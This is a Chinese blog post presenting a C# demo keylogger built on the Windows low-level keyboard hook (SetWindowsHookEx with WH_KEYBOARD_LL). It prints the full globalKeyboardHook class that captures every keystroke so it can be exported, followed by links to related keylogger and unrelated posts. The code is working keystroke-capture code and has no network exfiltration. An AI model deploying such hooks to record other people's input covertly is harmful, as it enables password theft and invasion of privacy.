设计背景

Win系统带有API可以获取键入值,本小程序主要应用了一个网上广为流传的类,可以说一个测试DEMO。有俗称为键盘钩子

设计思路

使用Win API获取建入值

相关技术

Win API

功能

开启记录,记录每个键盘键入值,最终可以导出

主要类

    class globalKeyboardHook

    {

        #region Constant, Structure and Delegate Definitions

        /// <summary>

        /// defines the callback type for the hook

        /// </summary>

        public delegate int keyboardHookProc(int code, int wParam, ref keyboardHookStruct lParam);

        public struct keyboardHookStruct

        {

            public int vkCode;

            public int scanCode;

            public int flags;

            public int time;

            public int dwExtraInfo;

        }

        const int WH_KEYBOARD_LL = 13;

        const int WM_KEYDOWN = 0x100;

        const int WM_KEYUP = 0x101;

        const int WM_SYSKEYDOWN = 0x104;

        const int WM_SYSKEYUP = 0x105;

        #endregion

        #region Instance Variables

        /// <summary>

        /// The collections of keys to watch for

        /// </summary>

        //public List<Keys> HookedKeys = new List<Keys>();

        /// <summary>

        /// Handle to the hook, need this to unhook and call the next hook

        /// </summary>

        IntPtr hhook = IntPtr.Zero;

        #endregion

        #region Events

        /// <summary>

        /// Occurs when one of the hooked keys is pressed

        /// </summary>

        public event KeyEventHandler KeyDown;

        /// <summary>

        /// Occurs when one of the hooked keys is released

        /// </summary>

        public event KeyEventHandler KeyUp;

        #endregion

        #region Constructors and Destructors

        /// <summary>

        /// Initializes a new instance of the <see cref="globalKeyboardHook"/> class and installs the keyboard hook.

        /// </summary>

        public globalKeyboardHook()

        {

            hook();

        }

        /// <summary>

        /// Releases unmanaged resources and performs other cleanup operations before the

        /// <see cref="globalKeyboardHook"/> is reclaimed by garbage collection and uninstalls the keyboard hook.

        /// </summary>

        ~globalKeyboardHook()

        {

            unhook();

        }

        #endregion

        #region Public Methods

        /// <summary>

        /// Installs the global hook

        /// </summary>

        public void hook()

        {

            IntPtr hInstance = LoadLibrary("User32");

            hhook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0);

        }

        /// <summary>

        /// Uninstalls the global hook

        /// </summary>

        public void unhook()

        {

            UnhookWindowsHookEx(hhook);

        }

        /// <summary>

        /// The callback for the keyboard hook

        /// </summary>

        /// <param name="code">The hook code, if it isn't >= 0, the function shouldn't do anyting</param>

        /// <param name="wParam">The event type</param>

        /// <param name="lParam">The keyhook event information</param>

        /// <returns></returns>

        public int hookProc(int code, int wParam, ref keyboardHookStruct lParam)

        {

            if (code >= 0)

            {

                Keys key = (Keys)lParam.vkCode;

                //if (HookedKeys.Contains(key))

                //{

                    KeyEventArgs kea = new KeyEventArgs(key);

                    if ((wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) && (KeyDown != null))

                    {

                        KeyDown(this, kea);

                    }

                    else if ((wParam == WM_KEYUP || wParam == WM_SYSKEYUP) && (KeyUp != null))

                    {

                        KeyUp(this, kea);

                    }

                    if (kea.Handled)

                        return 1;

                //}

            }

            return CallNextHookEx(hhook, code, wParam, ref lParam);

        }

        #endregion

        #region DLL imports

        /// <summary>

        /// Sets the windows hook, do the desired event, one of hInstance or threadId must be non-null

        /// </summary>

        /// <param name="idHook">The id of the event you want to hook</param>

        /// <param name="callback">The callback.</param>

        /// <param name="hInstance">The handle you want to attach the event to, can be null</param>

        /// <param name="threadId">The thread you want to attach the event to, can be null</param>

        /// <returns>a handle to the desired hook</returns>

        [DllImport("user32.dll")]

        static extern IntPtr SetWindowsHookEx(int idHook, keyboardHookProc callback, IntPtr hInstance, uint threadId);

        /// <summary>

        /// Unhooks the windows hook.

        /// </summary>

        /// <param name="hInstance">The hook handle that was returned from SetWindowsHookEx</param>

        /// <returns>True if successful, false otherwise</returns>

        [DllImport("user32.dll")]

        static extern bool UnhookWindowsHookEx(IntPtr hInstance);

        /// <summary>

        /// Calls the next hook.

        /// </summary>

        /// <param name="idHook">The hook id</param>

        /// <param name="nCode">The hook code</param>

        /// <param name="wParam">The wparam.</param>

        /// <param name="lParam">The lparam.</param>

        /// <returns></returns>

        [DllImport("user32.dll")]

        static extern int CallNextHookEx(IntPtr idHook, int nCode, int wParam, ref keyboardHookStruct lParam);

        /// <summary>

        /// Loads the library.

        /// </summary>

        /// <param name="lpFileName">Name of the library</param>

        /// <returns>A handle to the library</returns>

        [DllImport("kernel32.dll")]

        static extern IntPtr LoadLibrary(string lpFileName);

        #endregion

    }

GitHub

.NET-App/KeyboardRecord/

C# 键盘记录器的更多相关文章

  1. 警惕USB键盘记录器

    最近媒体报道了一种新型的能记录账号.密码输入的“USB键盘记录器”,引发网友关注,该设备看上去和普通U盘没什么区别,将其插入电脑USB接口,然后把键盘线和它连接,该设备就能够自动记录用户在电脑上输入的 ...

  2. wpf键盘记录器

    很简单的一个wpf键盘记录器 这个程序我一样用了全局勾子,之前用的都是winform上运行了,前一段时间 在国外的论坛上逛看到了一个wpf能用的就做了一个小程序记录一下,为了方便大家直关的看我在页面上 ...

  3. 小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser

    XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...

  4. [C语言(VC)] 打造自己的键盘记录器 (zaroty)

    说起键盘记录,想必很多朋友都用过网上流传的一些键盘记录软件吧,但是有没有想过自己写一个呢?也许你会想:会不会很复杂啊?我可以很负责的告诉你,写键盘记录是很简单的.你所需要的仅仅是懂得一些C语言的DLL ...

  5. 安全之路 —— 使用Windows全局钩子打造键盘记录器

    简介 键盘记录功能一直是木马等恶意软件窥探用户隐私的标配,那么这个功能是怎么实现的呢?在Ring3级下,微软就为我们内置了一个Hook窗口消息的API,也就是SetWindowsHookEx函数,这个 ...

  6. 6.文件所有权和权限----免费设置匿名----Windows键盘记录器----简介和python模块

    文件所有权和权限 touch --help cd Desktop mkdir Folder cd Folder clear touch Test1 Test2 Test3 Test4 ls ls -l ...

  7. 使用Windows全局钩子打造键盘记录器

    简介 键盘记录功能一直是木马等恶意软件窥探用户隐私的标配,那么这个功能是怎么实现的呢?在Ring3级下,微软就为我们内置了一个Hook窗口消息的API,也就是SetWindowsHookEx函数,这个 ...

  8. [Assembly]汇编编写简易键盘记录器

    环境:Windows xp sp3工具:masmnotepad++ 首先列出本次编程程序要执行的步骤:(1).读取键盘所输入的字符(2).输出到屏幕上(3).完善Esc.Backspace.空格.回车 ...

  9. Arduino UNO 键盘记录器中时钟接到2口或3口,其它接口不行。马上就要放弃了。要修改例子中时钟的引脚。

随机推荐

  1. C#简单的四位纯数字验证码

    验证码练手,整型.四位验证码 大体意思就是:四位纯数字验证,只要验证不成功就无限验证 刚开始在纠结怎么让整个过程循环起来,什么循环放到最外层,其实就是一个循环,看来自己的循环练习的还是不够多,不够灵活 ...

  2. AvalonEdit验证语法并提示错误

    <UserControl x:Class="WpfTestApp.Xml.XmlEditor" xmlns="http://schemas.microsoft.co ...

  3. 如何写一个Xss Bot

    如何写一个Xss Bot 现在的ctf比赛里 xss的出题方式比较特殊,一般使用xss bot,所以借鉴大佬经验尝试弄一个xss题目. xss bot 就是代替管理员去完成点击页面的任务,bot需要能 ...

  4. 安装VMware-tools时,一直停在“The path "" is not valid path to the gcc binary.”

    解决方案: 1.先停止安装(ctrl+Z) 2.在终端输入: yum -y update yum -y install kernel-headers kernel-devel gcc 3.重新安装VM ...

  5. 从零系列--node爬虫利用进程池写数据

    1.主进程 const http = require('http'); const fs = require('fs'); const cheerio = require('cheerio'); co ...

  6. jumpserver安装与部署

    1.简介 Jumpserver 是一款由Python编写开源的跳板机(堡垒机)系统,实现了跳板机应有的功能.基于ssh协议来管理,客户端无需安装agent.特点:  完全开源,GPL授权   Pyth ...

  7. java并发编程原理

    一.java内存模型 Java内存模型的主要目标是定义程序中各个变量的访问规则,即在虚拟机中将变量存储到内存和从内存中取出变量这样底层细节.此处的变量与Java编程时所说的变量不一样,指包括了实例字段 ...

  8. WPF 自定义 MessageBox (相对完善版 v1.0.0.6)

    基于WPF的自定义 MessageBox. 众所周知WPF界面美观.大多数WPF元素都可以简单的修改其样式,从而达到程序的风格统一.可是当你不得不弹出一个消息框通知用户消息时(虽然很不建议在程序中频繁 ...

  9. Scrum立会报告+燃尽图(十二月七日总第三十八次):功能测试

    此作业要求参见:https://edu.cnblogs.com/campus/nenu/2018fall/homework/2284 项目地址:https://git.coding.net/zhang ...

  10. 软件工程-东北师大站-第十次作业(PSP)

    1.本周PSP 2.本周进度条 3.本周累计进度图 代码累计折线图 博文字数累计折线图 4.本周PSP饼状图